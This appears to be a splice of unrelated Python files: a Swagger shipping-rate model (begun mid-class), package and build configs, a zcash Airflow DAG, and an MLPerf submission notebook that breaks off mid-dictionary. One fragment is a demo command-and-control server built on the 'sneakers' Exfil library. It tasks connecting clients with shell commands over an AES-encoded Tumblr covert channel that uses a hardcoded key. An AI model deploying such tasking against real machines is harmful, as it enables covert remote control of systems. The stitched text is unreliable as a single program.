    attribute_map = {
        'additional_options': 'additionalOptions',
        'base_shipping_cost': 'baseShippingCost',
        'destination_time_zone': 'destinationTimeZone',
        'max_estimated_delivery_date': 'maxEstimatedDeliveryDate',
        'min_estimated_delivery_date': 'minEstimatedDeliveryDate',
        'pickup_networks': 'pickupNetworks',
        'pickup_slot_id': 'pickupSlotId',
        'pickup_type': 'pickupType',
        'rate_id': 'rateId',
        'shipping_carrier_code': 'shippingCarrierCode',
        'shipping_carrier_name': 'shippingCarrierName',
        'shipping_quote_id': 'shippingQuoteId',
        'shipping_service_code': 'shippingServiceCode',
        'shipping_service_name': 'shippingServiceName',
        'total_shipping_cost': 'totalShippingCost'
    }

    def __init__(self, additional_options=None, base_shipping_cost=None,
                 destination_time_zone=None, max_estimated_delivery_date=None,
                 min_estimated_delivery_date=None, pickup_networks=None,
                 pickup_slot_id=None, pickup_type=None, rate_id=None,
                 shipping_carrier_code=None, shipping_carrier_name=None,
                 shipping_quote_id=None, shipping_service_code=None,
                 shipping_service_name=None, total_shipping_cost=None):  # noqa: E501
        """PurchasedRate - a model defined in Swagger

        All parameters are optional; omitted fields stay None and are
        reported as None by to_dict().
        """
        # Snapshot of the constructor arguments, keyed by attribute name
        # (parameter names intentionally equal the swagger_types keys).
        arguments = {name: value for name, value in locals().items() if name != 'self'}
        self.discriminator = None
        for name in self.swagger_types:
            setattr(self, '_' + name, None)  # backing slot for the property
            if arguments[name] is not None:
                # Route through the property setter, exactly as the original
                # generated constructor did.
                setattr(self, name, arguments[name])

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # `.items()` replaces the former `six.iteritems(...)`; `six` was the
        # module's only non-stdlib dependency and is unneeded on Python 3.
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            else:
                result[attr] = value
        # (the generated `issubclass(PurchasedRate, dict)` branch was dead
        # code — this class never subclasses dict — and has been removed)
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, PurchasedRate):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other


def _model_property(name):
    """Build the plain get/set property for *name*, backed by '_<name>'.

    Replaces the fifteen identical hand-written @property/@x.setter pairs
    emitted by swagger-codegen; accessor behavior is unchanged.
    """
    def _get(self):
        return getattr(self, '_' + name)

    def _set(self, value):
        setattr(self, '_' + name, value)

    return property(_get, _set, doc="The %s of this PurchasedRate.  # noqa: E501" % name)


for _attr in PurchasedRate.swagger_types:
    setattr(PurchasedRate, _attr, _model_property(_attr))
del _attr
""" Define functions, classes, and constants that are exposed to the client, enabling calls to fables.* . """ from fables.api import detect, parse from fables.tree import ( StreamManager, FileNode, MimeTypeFileNode, Directory, Zip, Csv, Xls, Xlsx, Xlsb, Skip, mimetype_from_stream, mimetype_and_extension, ) from fables.table import Table from fables.errors import ParseError, ExtractError from fables.constants import OS_PATTERNS_TO_SKIP, MAX_FILE_SIZE __all__ = [ "detect", "parse", "StreamManager", "FileNode", "MimeTypeFileNode", "Directory", "Zip", "Csv", "Xls", "Xlsx", "Xlsb", "Skip", "mimetype_from_stream", "mimetype_and_extension", "Table", "ParseError", "ExtractError", "OS_PATTERNS_TO_SKIP", "MAX_FILE_SIZE", ] # Note: When changing version also be sure to change the version in setup.py __version__ = "1.2.5"
import FWCore.ParameterSet.Config as cms # Module to create simulated GEM-CSC trigger pad digis. simMuonGEMPadDigis = cms.EDProducer("GEMPadDigiProducer", InputCollection = cms.InputTag('simMuonGEMDigis'), ) from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon from Configuration.ProcessModifiers.premix_stage2_cff import premix_stage2 (premix_stage2 & phase2_muon).toModify(simMuonGEMPadDigis, InputCollection = "mixData")
""" A simple demo server. It waits to receive connections from a client, then instructs that client to run `ls -al`, waits for the results, and prints them. Should work with multiple clients but honestly anything more than what I described above is untested. """ import json import random import string from time import sleep from sneakers import Exfil mod = "tumblr_text" with open('sneakers/config/{}_config.json'.format(mod), 'rb') as f: file_data = f.read() params = json.loads(file_data) enc = ['aes'] t = Exfil(mod, enc) aes_params = {'key': 'apassword'} t.set_encoder_params('aes', {'sending': aes_params, 'receiving': aes_params}) t.set_channel_params({'sending': params, 'receiving': params}) clients = {} def make_fragment_id(): return ''.join(random.choice(string.ascii_letters + string.digits) for i in range(20)) def make_client_id(): return ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8)) def get_client_for_fragment(packet): send_fragment = packet.split('|')[0] new_fragment = packet.split('|')[-1] client_id = filter(lambda c: clients[c]['current_fragment_id'] == send_fragment, clients) try: client_id = client_id[0] except IndexError: # no client found! 
return None # update the client with the new fragment id to use for them clients[client_id]['current_fragment_id'] = new_fragment # since we got something from the client, they are just waiting for us now # (therefore we are ready to send to them at any time) clients[client_id]['waiting'] = True return client_id def send_packet_to_client(client_id, payload): """ Given a payload, wraps it in the proper fragment_id fields and sends it off """ # update to note that we have sent to the client and it is no longer # just waiting around to get a packet - it has been tasked and is busy clients[client_id]['waiting'] = False fragment_id = clients[client_id]['current_fragment_id'] new_fragment_id = make_fragment_id() clients[client_id]['current_fragment_id'] = new_fragment_id packet = '{}|{}|{}'.format(fragment_id, payload, new_fragment_id) t.send(packet) def handle_packet(packet): tokens = packet.split('|') if tokens[1] == "connected": if tokens[0] in [clients[c]['initial_fragment_id'] for c in clients]: # we've already seen this one return print("New client connected!") client_id = make_client_id() clients[client_id] = { 'initial_fragment_id': tokens[0], 'current_fragment_id': tokens[-1], 'waiting': True # is the client ready for a new packet? } # task the client right away send_packet_to_client(client_id, "shell|ls -al") # now check to see if we have a thread going; "connected" is a special case client_id = get_client_for_fragment(packet) if client_id is None: # no client found! ignore. return # now process our packet (since we know who it came from) if tokens[1] == "result": print("Got a result:") print(packet) while True: for packet in t.receive(): handle_packet(packet) print("Clients:") print(clients) print("") sleep(15)
import setuptools with open("README.md", "r") as fh: long_description = fh.read() setuptools.setup( name="pystardog", version="0.9.7", author="Stardog Union", author_email="support@stardog.com", description="Use Stardog with Python!", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/stardog-union/pystardog", packages=setuptools.find_packages(), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", ], install_requires=[ 'requests>=2.22.0', 'requests-toolbelt>=0.9.1', 'contextlib2>=0.5.5', ], setup_requires=['pytest-runner'], tests_require=['pytest'], )
from __future__ import print_function from bitcoinetl.build_export_dag import build_export_dag from bitcoinetl.variables import read_export_dag_vars # When searching for DAGs, Airflow will only consider files where the string "airflow" and "DAG" both appear in the # contents of the .py file. DAG = build_export_dag( dag_id='zcash_export_dag', chain='zcash', **read_export_dag_vars( var_prefix='zcash_', export_schedule_interval='0 16 * * *', export_start_date='2016-10-28', export_max_workers=3, export_batch_size=1, ) )
#!/usr/bin/env python
# coding: utf-8

# # Generate [dividiti](http://dividiti.com)'s submissions to [MLPerf Inference v0.5](https://github.com/mlperf/inference/tree/master/v0.5)

# <a id="overview"></a>
# ## Overview

# This Jupyter notebook covers [dividiti](http://dividiti.com)'s submissions to
# [MLPerf Inference v0.5](https://github.com/mlperf/inference/tree/master/v0.5). It validates that experimental data
# obtained via automated, portable and reproducible [Collective Knowledge](http://cknowledge.org) workflows conforms to
# [General MLPerf Submission Rules](https://github.com/mlperf/policies/blob/master/submission_rules.adoc)
# and [MLPerf Inference Rules](https://github.com/mlperf/inference_policies/blob/master/inference_rules.adoc),
# including running the official [`submission_checker.py`](https://github.com/mlperf/inference/blob/master/v0.5/tools/submission/submission-checker.py).

# A live version of this Jupyter Notebook can be viewed [here](https://nbviewer.jupyter.org/urls/dl.dropbox.com/s/1xlv5oacgobrfd4/mlperf-inference-v0.5-dividiti.ipynb).

# ## Table of Contents

# 1. [Overview](#overview)
# 1. [Includes](#includes)
# 1. [System templates](#templates)
#    1. [Firefly RK3399](#templates_firefly)
#    1. [Linaro HiKey960](#templates_hikey960)
#    1. [Huawei Mate 10 Pro](#templates_mate10pro)
#    1. [Raspberry Pi 4](#templates_rpi4)
#    1. [HP Z640](#templates_velociti)
#    1. [Default](#templates_default)
# 1. [Systems](#systems)
# 1. [Implementations](#implementations)
# 1. [Get the experimental data](#get)
#    1. [Image Classification - Closed](#get_image_classification_closed)
#    1. [Image Classification - Open](#get_image_classification_open)
#    1. [Object Detection - Open](#get_object_detection_open)
# 1. [Generate the submission checklist](#checklist)
# 1. [Check the experimental data](#check)

# <a id="includes"></a>
# ## Includes

# ### Standard

# In[ ]:

import os
import sys
import json
import re

from pprint import pprint
from shutil import copy2
from copy import deepcopy

# ### Scientific

# If some of the scientific packages are missing, please install them using:
# ```
# # python3 -m pip install jupyter pandas numpy matplotlib seaborn --user
# ```

# In[ ]:

import IPython as ip
import pandas as pd
import numpy as np

print ('IPython version: %s' % ip.__version__)
print ('Pandas version: %s' % pd.__version__)
print ('NumPy version: %s' % np.__version__)

# No need to hardcode e.g. as:
# sys.path.append('$CK_TOOLS/tool-coco-master-gcc-8.3.0-compiler.python-3.6.10-linux-64/')
# since it gets added to the Python path automatically via the dependency.
from pycocotools.coco import COCO

# No need to hardcode (e.g. as '$CK_TOOLS/dataset-coco-2017-val'),
# since it gets added to the path automatically via the dependency.
coco_dir = os.environ.get('CK_ENV_DATASET_COCO','')
if coco_dir=='':
    print('Error: Path to COCO dataset not defined!')
    exit(1)

# No need to hardcode (e.g. as '$CK_TOOLS/dataset-imagenet-ilsvrc2012-aux/val.txt'),
# since it gets added to the path automatically via the dependency.
imagenet_val_file = os.environ.get('CK_CAFFE_IMAGENET_VAL_TXT','')
if imagenet_val_file=='':
    print('Error: Path to ImageNet labels not defined!')
    exit(1)

# ### Collective Knowledge

# If CK is not installed, please install it using:
# ```
# # python -m pip install ck
# ```

# In[ ]:

import ck.kernel as ck
print ('CK version: %s' % ck.__version__)

# <a id="templates"></a>
# ## System templates

# Per-platform `system_desc_id.json` templates; 'division', 'status' and
# 'framework' are filled in later when the per-system descriptions are
# generated.

# <a id="templates_firefly"></a>
# ### [Firefly-RK3399](http://en.t-firefly.com/product/rk3399/)

# In[ ]:

firefly = {
    "division": "",
    "submitter": "dividiti",
    "status": "available",
    "system_name": "Firefly-RK3399 (firefly)",
    "number_of_nodes": "1",
    "host_processor_model_name": "Arm Cortex-A72 MP2 (big); Arm Cortex-A53 MP4 (LITTLE)",
    "host_processors_per_node": "1",
    "host_processor_core_count": "2 (big); 4 (LITTLE)",
    "host_processor_frequency": "1800 MHz (big), 1400 MHz (LITTLE)",
    "host_processor_caches": "L1I$ 48 KiB, L1D$ 32 KiB, L2$ 1 MiB (big); L1I$ 32 KiB, L1D$ 32 KiB, L2$ 512 KiB (LITTLE)",
    "host_memory_configuration": "-",
    "host_memory_capacity": "4 GiB",
    "host_storage_capacity": "128 GiB",
    "host_storage_type": "SanDisk Extreme microSD",
    "host_processor_interconnect": "-",
    "host_networking": "-",
    "host_networking_topology": "-",
    "accelerators_per_node": "1",
    "accelerator_model_name": "Arm Mali-T860 MP4",
    "accelerator_frequency": "800 MHz",
    "accelerator_host_interconnect": "-",
    "accelerator_interconnect": "-",
    "accelerator_interconnect_topology": "-",
    "accelerator_memory_capacity": "4 GiB (shared with host)",
    "accelerator_memory_configuration": "-",
    "accelerator_on-chip_memories": "-",
    "cooling": "on-board fan",
    "hw_notes": "http://en.t-firefly.com/product/rk3399/; http://opensource.rock-chips.com/wiki_RK3399",
    "framework": "",
    "operating_system": "Ubuntu 16.04.6 LTS; kernel 4.4.77 #554 (Thu Nov 30 11:30:11 HKT 2017)",
    "other_software_stack": "GCC 7.4.0; Python 3.5.2; OpenCL driver 1.2 v1.r13p0-00rel0-git(a4271c9).31ba04af2d3c01618138bef3aed66c2c",
    "sw_notes": "Powered by Collective Knowledge v1.11.1"
}

# <a id="templates_hikey960"></a>
# ### [Linaro HiKey960](https://www.96boards.org/product/hikey960/)

# In[ ]:

hikey960 = {
    "division": "",
    "submitter": "dividiti",
    "status": "available",
    "system_name": "Linaro HiKey960 (hikey960)",
    "number_of_nodes": "1",
    "host_processor_model_name": "Arm Cortex-A73 MP4 (big); Arm Cortex-A53 MP4 (LITTLE)",
    "host_processors_per_node": "1",
    "host_processor_core_count": "4 (big); 4 (LITTLE)",
    "host_processor_frequency": "2362 MHz (big), 1844 MHz (LITTLE)",
    "host_processor_caches": "L1I$ 256=4x64 KiB, L1D$ 256=4x64 KiB, L2$ 2 MiB (big); L1I$ 128=4x32 KiB, L1D$ 128=4x32 KiB, L2$ 1 MiB (LITTLE)",
    "host_memory_configuration": "-",
    "host_memory_capacity": "3 GiB",
    "host_storage_capacity": "128 GiB",
    "host_storage_type": "SanDisk Extreme microSD",
    "host_processor_interconnect": "-",
    "host_networking": "-",
    "host_networking_topology": "-",
    "accelerators_per_node": "1",
    "accelerator_model_name": "Arm Mali-G71 MP8",
    "accelerator_frequency": "800 MHz",
    "accelerator_host_interconnect": "-",
    "accelerator_interconnect": "-",
    "accelerator_interconnect_topology": "-",
    "accelerator_memory_capacity": "3 GiB (shared with host)",
    "accelerator_memory_configuration": "-",
    "accelerator_on-chip_memories": "-",
    "cooling": "small external fan",
    "hw_notes": "http://www.hisilicon.com/en/Products/ProductList/Kirin",
    "framework": "",
    "operating_system": "Debian 9; kernel 4.19.5-hikey #26 (Thu Aug 22 07:58:35 UTC 2019)",
    "other_software_stack": "GCC 7.4.0; Python 3.5.3; OpenCL driver 2.0 v1.r16p0",
    "sw_notes": "Powered by Collective Knowledge v1.11.1"
}

# <a id="templates_mate10pro"></a>
# ### Huawei Mate 10 Pro

# In[ ]:

mate10pro = {
    "division": "",
    "submitter": "dividiti",
    "status": "available",
    "system_name": "Huawei Mate 10 Pro (mate10pro)",
    "number_of_nodes": "1",
    "host_processor_model_name": "Arm Cortex-A73 MP4 (big); Arm Cortex-A53 MP4 (LITTLE)",
    "host_processors_per_node": "1",
    "host_processor_core_count": "4 (big); 4 (LITTLE)",
    "host_processor_frequency": "2360 MHz (big), 1800 MHz (LITTLE)",
    "host_processor_caches": "L1I$ 256=4x64 KiB, L1D$ 256=4x64 KiB, L2$ 2 MiB (big); L1I$ 128=4x32 KiB, L1D$ 128=4x32 KiB, L2$ 1 MiB (LITTLE)",
    "host_memory_configuration": "-",
    "host_memory_capacity": "6 GiB",
    "host_storage_capacity": "128 GiB",
    "host_storage_type": "Flash",
    "host_processor_interconnect": "-",
    "host_networking": "-",
    "host_networking_topology": "-",
    "accelerators_per_node": "1",
    "accelerator_model_name": "Arm Mali-G72 MP12",
    "accelerator_frequency": "850 MHz",
    "accelerator_host_interconnect": "-",
    "accelerator_interconnect": "-",
    "accelerator_interconnect_topology": "-",
    "accelerator_memory_capacity": "6 GiB (shared with host)",
    "accelerator_memory_configuration": "-",
    "accelerator_on-chip_memories": "-",
    "cooling": "phone case",
    "hw_notes": "https://en.wikichip.org/wiki/hisilicon/kirin/970",
    "framework": "",
    "operating_system": "Android 9.1.0.300(C782E5R1P11); kernel 4.9.148 (Sat Jun 29 20:41:06 CST 2019)",
    "other_software_stack": "Android NDK 17c (LLVM 6.0.2); OpenCL driver 2.0 v1.r14p0-00cet0.0416641283c5d6e2d53c163d0ca99357",
    "sw_notes": "Powered by Collective Knowledge v1.11.1"
}

# <a id="templates_rpi4"></a>
# ### Raspberry Pi 4

# In[ ]:

rpi4 = {
    "division": "",
    "submitter": "dividiti",
    "status": "available",
    "system_name": "Raspberry Pi 4 (rpi4)",
    "number_of_nodes": "1",
    "host_processor_model_name": "Arm Cortex-A72 MP4",
    "host_processors_per_node": "1",
    "host_processor_core_count": "4",
    "host_processor_frequency": "1500 MHz",
    "host_processor_caches": "L1I$ 128=4x32 KiB, L1D$ 128=4x32 KiB, L2$ 1 MiB",
    "host_memory_configuration": "-",
    "host_memory_capacity": "4 GiB",
    "host_storage_capacity": "128 GiB",
    "host_storage_type": "SanDisk Extreme Pro microSD",
    "host_processor_interconnect": "-",
    "host_networking": "-",
    "host_networking_topology": "-",
    "accelerators_per_node": "0",
    "accelerator_model_name": "-",
    "accelerator_frequency": "-",
    "accelerator_host_interconnect": "-",
    "accelerator_interconnect": "-",
    "accelerator_interconnect_topology": "-",
    "accelerator_memory_capacity": "-",
    "accelerator_memory_configuration": "-",
    "accelerator_on-chip_memories": "-",
    "cooling": "http://www.raspberrypiwiki.com/index.php/Armor_Case_B",
    "hw_notes": "https://www.raspberrypi.org/products/raspberry-pi-4-model-b/specifications/",
    "framework": "",
    "operating_system": "Raspbian Buster (Debian 10); kernel 4.19.66-v7l+ #1253 (Thu Aug 15 12:02:08 BST 2019)",
    "other_software_stack": "GCC 8.3.0; Python 3.7.3",
    "sw_notes": "Powered by Collective Knowledge v1.11.1"
}

# <a id="templates_velociti"></a>
# ### HP Z640 workstation

# In[ ]:

velociti = {
    "division": "",
    "submitter": "dividiti",
    "status": "available",
    "system_name": "HP Z640 G1X62EA workstation (velociti)",
    "number_of_nodes": "1",
    "host_processor_model_name": "Intel Xeon CPU E5-2650 v3",
    "host_processors_per_node": "1",
    "host_processor_core_count": "10",
    "host_processor_frequency": "2300 MHz (base); 3000 MHz (turbo)",
    "host_processor_caches": "L1I$ 10x32 KiB, L1D$ 10x32 KiB; L2$ 10x256 KiB; L3$ 25 MiB",
    "host_memory_configuration": "DDR4 (max bandwidth 68 GB/s)",
    "host_memory_capacity": "32 GiB",
    "host_storage_capacity": "512 GiB",
    "host_storage_type": "SSD",
    "host_processor_interconnect": "-",
    "host_networking": "-",
    "host_networking_topology": "-",
    "accelerators_per_node": "1",
    "accelerator_model_name": "NVIDIA GeForce GTX 1080",
    "accelerator_frequency": "1607 MHz (base); 1733 MHz (boost)",
    "accelerator_host_interconnect": "-",
    "accelerator_interconnect": "-",
    "accelerator_interconnect_topology": "-",
    "accelerator_memory_capacity": "8 GiB",
    "accelerator_memory_configuration": "GDDR5X (max bandwidth 320 GB/s)",
    "accelerator_on-chip_memories": "20x48 KiB",
    "cooling": "standard",
    "hw_notes": "The Intel CPU has reached its end-of-life (EOL). http://h20195.www2.hp.com/v2/default.aspx?cc=ie&lc=en&oid=7528701; https://ark.intel.com/products/81705/Intel-Xeon-Processor-E5-2650-v3-25M-Cache-2_30-GHz; http://www.cpu-world.com/CPUs/Xeon/Intel-Xeon%20E5-2650%20v3.html; http://www.geforce.co.uk/hardware/10series/geforce-gtx-1080/",
    "framework": "TensorFlow v1.14",
    "operating_system": "Ubuntu 16.04.6 LTS; kernel 4.4.0-112-generic #135-Ubuntu SMP (Fri Jan 19 11:48:36 UTC 2018)",
    "other_software_stack": "Driver 430.50; CUDA 10.1; TensorRT 5.1.5; Docker 19.03.3 (build a872fc2); GCC 7.4.0; Python 3.5.2",
    "sw_notes": "Powered by Collective Knowledge v1.11.4"
}

# <a id="templates_default"></a>
# ### Default

# In[ ]:

# Default `system_desc_id.json` (to catch uninitialized descriptions)
default_system_json = {
    # FIX: was "reqired" -- the typo'd sentinel would not read as "required"
    # like every other mandatory field in this template.
    "division": "required",
    "submitter": "required",
    "status": "required",
    "system_name": "required",
    "number_of_nodes": "required",
    "host_processor_model_name": "required",
    "host_processors_per_node": "required",
    "host_processor_core_count": "required",
    "host_processor_frequency": "",
    "host_processor_caches": "",
    "host_memory_configuration": "",
    "host_memory_capacity": "required",
    "host_storage_capacity": "required",
    "host_storage_type": "required",
    "host_processor_interconnect": "",
    "host_networking": "",
    "host_networking_topology": "",
    "accelerators_per_node": "required",
    "accelerator_model_name": "required",
    "accelerator_frequency": "",
    "accelerator_host_interconnect": "",
    "accelerator_interconnect": "",
    "accelerator_interconnect_topology": "",
    "accelerator_memory_capacity": "required",
    "accelerator_memory_configuration": "",
    "accelerator_on-chip_memories": "",
    "cooling": "",
    "hw_notes": "",
    "framework": "required",
    "operating_system": "required",
    "other_software_stack": "required",
    "sw_notes": ""
}

# <a id="systems"></a>
# ## Systems

# In[ ]:

# Generate division_systems dictionary.
# One system description per (division, platform, library/backend) combination,
# keyed e.g. 'open-firefly-tflite-v1.15'.
division_systems = {}

platform_templates = {
    'firefly'   : firefly,
    'hikey960'  : hikey960,
    'mate10pro' : mate10pro,
    'rpi4'      : rpi4,
    'velociti'  : velociti
}

divisions = [ 'open', 'closed' ]

platforms = [ 'firefly', 'hikey960', 'mate10pro', 'rpi4', 'velociti' ]

for division in divisions:
    for platform in platforms:
        # Each platform supports a different set of inference libraries.
        if platform == 'velociti':
            libraries = [ 'tensorflow-v1.14', 'tensorrt-v6.0' ]
        elif platform == 'mate10pro':
            libraries = [ 'tflite-v1.13', 'armnn-v19.08' ]
        elif platform == 'rpi4':
            libraries = [ 'tflite-v1.15.0', 'tflite-v1.15', 'armnn-v19.08' ]
        else:
            libraries = [ 'tflite-v1.15', 'armnn-v19.08' ]
        for library in libraries:
            # Expand each library into its per-backend variants.
            if library == 'armnn-v19.08':
                if platform == 'rpi4':
                    backends = [ 'neon' ]  # no usable GPU on the Pi
                else:
                    backends = [ 'neon', 'opencl' ]
                library_backends = [ library+'-'+backend for backend in backends ]
            elif library == 'tensorflow-v1.14':
                backends = [ 'cpu', 'cuda', 'tensorrt', 'tensorrt-dynamic' ]
                library_backends = [ library+'-'+backend for backend in backends ]
            else:
                library_backends = [ library ]
            for library_backend in library_backends:
                division_system = division+'-'+platform+'-'+library_backend
                frameworks = {
                    'armnn-v19.08-opencl' : 'ArmNN v19.08 (OpenCL)',
                    'armnn-v19.08-neon' : 'ArmNN v19.08 (Neon)',
                    'tflite-v1.13': 'TFLite v1.13.1',
                    'tflite-v1.15': 'TFLite v1.15.0-rc2',
                    'tflite-v1.15.0': 'TFLite v1.15.0',
                    'tensorrt-v6.0' : 'TensorRT v6.0',
                    'tensorflow-v1.14-cpu': 'TensorFlow v1.14 (CPU)',
                    'tensorflow-v1.14-cuda': 'TensorFlow v1.14 (CUDA)',
                    'tensorflow-v1.14-tensorrt': 'TensorFlow v1.14 (TensorRT-static)',
                    'tensorflow-v1.14-tensorrt-dynamic': 'TensorFlow v1.14 (TensorRT-dynamic)',
                }
                if library_backend == 'tensorflow-v1.14-cpu':
                    status = 'RDI'
                elif library_backend == 'tflite-v1.15.0' or library_backend == 'tensorrt-v6.0':
                    status = 'unofficial'
                else:
                    status = 'available'
                # Deep-copy so per-system tweaks do not leak into the shared template.
                template = deepcopy(platform_templates[platform])
                template.update({
                    'division' : division,
                    'submitter' : 'dividiti', # 'dividiti' if platform != 'velociti' else 'dividiti, Politecnico di Milano'
                    'status' : status,
                    'framework' : frameworks[library_backend]
                })
                # CPU-only configurations blank out the accelerator fields.
                if (not library_backend.startswith('tensorrt') and not library_backend.startswith('tensorflow') and not library_backend.endswith('opencl')) or library_backend.endswith('cpu'):
                    template.update({
                        'accelerator_frequency' : '-',
                        'accelerator_memory_capacity' : '-',
                        'accelerator_memory_configuration': '-',
                        'accelerator_model_name' : '-',
                        'accelerator_on-chip_memories': '-',
                        'accelerators_per_node' : '0',
                    })
                division_systems[division_system] = template
                print("=" * 100)
                print(division_system)
                print("=" * 100)
                pprint(template)
                print("-" * 100)
                print("")

# <a id="implementations"></a>
# ## Implementations

# ### Image classification

# In[ ]:

# Generate implementation_benchmarks dictionary.
implementation_benchmarks = {}

# Default `system_desc_id_imp.json` (to catch uninitialized descriptions)
default_implementation_benchmark_json = {
    "input_data_types": "required",
    "retraining": "required",
    "starting_weights_filename": "required",
    "weight_data_types": "required",
    "weight_transformations": "required"
}

# For each image classification implementation.
for implementation in [ 'image-classification-tflite', 'image-classification-armnn-tflite' ]:
    # Add MobileNet.
    implementation_mobilenet = implementation+'-'+'mobilenet'
    implementation_benchmarks[implementation_mobilenet] = {
        "input_data_types": "fp32",
        "weight_data_types": "fp32",
        "retraining": "no",
        "starting_weights_filename": "https://zenodo.org/record/2269307/files/mobilenet_v1_1.0_224.tgz",
        "weight_transformations": "TFLite"
    }
    # Add MobileNet quantized.
    implementation_mobilenet_quantized = implementation+'-'+'mobilenet-quantized'
    implementation_benchmarks[implementation_mobilenet_quantized] = {
        "input_data_types": "uint8",
        "weight_data_types": "uint8",
        "retraining": "no",
        "starting_weights_filename": "https://zenodo.org/record/2269307/files/mobilenet_v1_1.0_224_quant.tgz",
        "weight_transformations": "TFLite"
    }
    # Add ResNet.
    implementation_resnet = implementation+'-'+'resnet'
    implementation_benchmarks[implementation_resnet] = {
        "input_data_types": "fp32",
        "weight_data_types": "fp32",
        "retraining": "no",
        "starting_weights_filename": "https://zenodo.org/record/2535873/files/resnet50_v1.pb",
        "weight_transformations": "TF -> TFLite"
    }

    # Add any MobileNets-v1,v2 model.
    def add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution, quantized=False):
        """Register one MobileNet variant for the current `implementation`.

        NOTE(review): `implementation` is read from the enclosing loop rather
        than passed in, so this helper is defined and used inside the loop body.
        """
        base_url = 'https://zenodo.org/record/2269307/files' if version == 1 else 'https://zenodo.org/record/2266646/files'
        url = '{}/mobilenet_v{}_{}_{}{}.tgz'.format(base_url, version, multiplier, resolution, '_quant' if quantized else '')
        benchmark = 'mobilenet-v{}-{}-{}{}'.format(version, multiplier, resolution, '-quantized' if quantized else '')
        # Quantized variants exist only for MobileNet-v1 with the TFLite implementation.
        if quantized and (version != 1 or implementation != 'image-classification-tflite'):
            return
        if implementation == 'image-classification-tflite':
            weights_transformations = 'TFLite'
        elif implementation == 'image-classification-armnn-tflite':
            weights_transformations = 'TFLite -> ArmNN'
        else:
            # FIX: raising a plain string is a TypeError in Python 3
            # (exceptions must derive from BaseException).
            raise ValueError("Unknown implementation '%s'!" % implementation)
        implementation_benchmark = implementation+'-'+benchmark
        implementation_benchmarks[implementation_benchmark] = {
            "input_data_types": "uint8" if quantized else "fp32",
            "weight_data_types": "uint8" if quantized else "fp32",
            "retraining": "no",
            "starting_weights_filename": url,
            "weight_transformations": weights_transformations
        }
        return

    # MobileNet-v1.
    version = 1
    for multiplier in [ 1.0, 0.75, 0.5, 0.25 ]:
        for resolution in [ 224, 192, 160, 128 ]:
            add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution, quantized=False)
            add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution, quantized=True)

    # MobileNet-v2.
    version = 2
    for multiplier in [ 1.0, 0.75, 0.5, 0.35 ]:
        for resolution in [ 224, 192, 160, 128, 96 ]:
            add_implementation_mobilenet(implementation_benchmarks, version, multiplier, resolution)
    add_implementation_mobilenet(implementation_benchmarks, version=2, multiplier=1.3, resolution=224)
    add_implementation_mobilenet(implementation_benchmarks, version=2, multiplier=1.4, resolution=224)

for implementation in [ 'image-classification-tensorrt-loadgen-py']:
    # Add ResNet.
    implementation_resnet = implementation+'-'+'resnet'
    implementation_benchmarks[implementation_resnet] = {
        "input_data_types": "fp32",
        "weight_data_types": "fp32",
        "retraining": "no",
        "starting_weights_filename": "https://zenodo.org/record/2535873/files/resnet50_v1.pb",
        "weight_transformations": "ONNX -> TensorRT"
    }
    # Add MobileNet.
    implementation_mobilenet = implementation+'-'+'mobilenet'
    implementation_benchmarks[implementation_mobilenet] = {
        "input_data_types": "int8",
        "weight_data_types": "int8",
        "retraining": "no",
        "starting_weights_filename": "https://zenodo.org/record/2269307/files/mobilenet_v1_1.0_224.tgz",
        "weight_transformations": "TF -> TensorRT"
    }

# ### Object detection

# In[ ]:

object_detection_benchmarks = {
    'rcnn-nas-lowproposals' : {
        "name" : "Faster-RCNN-NAS lowproposals",
        "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_nas_lowproposals_coco_2018_01_28.tar.gz",
        "width" : 1200, "height" : 1200,
    },
    'rcnn-resnet50-lowproposals' : {
        "name" : "Faster-RCNN-ResNet50 lowproposals",
        "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet50_lowproposals_coco_2018_01_28.tar.gz",
        "width" : 1024, "height" : 600,
    },
    'rcnn-resnet101-lowproposals' : {
        "name" : "Faster-RCNN-ResNet101 lowproposals",
        "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet101_lowproposals_coco_2018_01_28.tar.gz",
        "width" : 1024, "height" : 600,
    },
    'rcnn-inception-resnet-v2-lowproposals' : {
        "name" : "Faster-RCNN-Inception-ResNet-v2 lowproposals",
        "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_resnet_v2_atrous_lowproposals_coco_2018_01_28.tar.gz",
        "width" : 1024, "height" : 600,
    },
    'rcnn-inception-v2' : {
        "name" : "Faster-RCNN Inception-v2",
        "url" : "http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_v2_coco_2018_01_28.tar.gz",
        "width" : 1024, "height" : 600,
    },
    'ssd-inception-v2' : {
        "name" : "SSD-Inception-v2",
        "url" : "http://download.tensorflow.org/models/object_detection/ssd_inception_v2_coco_2018_01_28.tar.gz",
        "width" : 300, "height" : 300,
    },
    # NOTE(review): the '...-quantized-mlperf' / '...-non-quantized-mlperf' keys
    # look swapped relative to their contents (this 'quantized' key points at
    # the fp32 Google model; the 'non-quantized' key at Habana's 8-bit model).
    # Left as-is because benchmark names are derived from these keys --
    # verify against the submitted result directories before changing.
    'ssd-mobilenet-v1-quantized-mlperf' : {
        "name" : "MLPerf SSD-MobileNet",
